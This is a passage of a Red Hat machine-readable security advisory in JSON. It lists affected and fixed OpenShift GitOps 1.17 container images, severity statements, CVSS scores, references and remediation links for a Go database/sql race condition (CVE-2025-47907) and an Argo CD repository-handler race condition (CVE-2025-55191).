"text": "A flaw was found in database/sql. Concurrent queries can produce unexpected results when a query is cancelled during a Scan method call on returned Rows, creating a race condition. This vulnerability allows an attacker who can initiate and cancel queries to trigger this condition, possibly leading to inconsistent data being returned to the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "database/sql: Postgres Scan Race Condition",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability marked as Moderate severity issues rather than Important. The os/exec LookPath flaw requires a misconfigured PATH to be exploitable, and the database/sql race condition primarily impacts applications that cancel queries while running multiple queries concurrently. Both can cause unexpected behavior, but the exploitation scope is limited and unlikely to result in direct compromise in most typical deployments.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027) vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nRed Hat enforces the principle of least functionality, ensuring that only essential features, services, and ports are enabled. The environment leverages malicious code protections such as IPS/IDS and antimalware solutions that detect and respond to indicators in real time, limiting the impact of exploitation attempts. Static code analysis and peer code review techniques are used to execute robust input validation and error-handling mechanisms to ensure all user inputs are thoroughly validated, preventing improperly validated inputs from causing system instability, exposing sensitive data, or escalating risks. In the case of successful exploitation, detection and containment controls are in place to limit impacts by alerting on anomalous system behavior in real time, while process isolation and automated orchestration via Kubernetes minimize the likelihood of concurrent execution scenarios that would trigger the race condition and help contain the impact to a single process.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64"
],
"known_not_affected": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "RHBZ#2387083",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387083"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://go.dev/cl/693735",
"url": "https://go.dev/cl/693735"
},
{
"category": "external",
"summary": "https://go.dev/issue/74831",
"url": "https://go.dev/issue/74831"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM",
"url": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-3849",
"url": "https://pkg.go.dev/vuln/GO-2025-3849"
}
],
"release_date": "2025-08-07T15:25:30.704000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-09T18:48:05+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:17731"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "database/sql: Postgres Scan Race Condition"
},
{
"cve": "CVE-2025-55191",
"cwe": {
"id": "CWE-362",
"name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
},
"discovery_date": "2025-09-30T23:00:51.184899+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2400562"
}
],
"notes": [
{
"category": "description",
"text": "Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Versions between 2.1.0 and 2.14.19, 3.2.0-rc1, 3.1.0-rc1 through 3.1.7, and 3.0.0-rc1 through 3.0.18 contain a race condition in the repository credentials handler that can cause the Argo CD server to panic and crash when concurrent operations are performed on the same repository URL. The vulnerability is located in numerous repository related handlers in the util/db/repository_secrets.go file. A valid API token with repositories resource permissions (create, update, or delete actions) is required to trigger the race condition. This vulnerability causes the entire Argo CD server to crash and become unavailable. Attackers can repeatedly and continuously trigger the race condition to maintain a denial-of-service state, disrupting all GitOps operations. This issue is fixed in versions 2.14.20, 3.2.0-rc2, 3.1.8 and 3.0.19.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/argoproj/argo-cd/v2: github.com/argoproj/argo-cd/v3: Argo CD race condition leading to crash",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The availability risk of this vulnerability is limited to the Argo CD server itself. The host system running Argo CD is not at risk.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
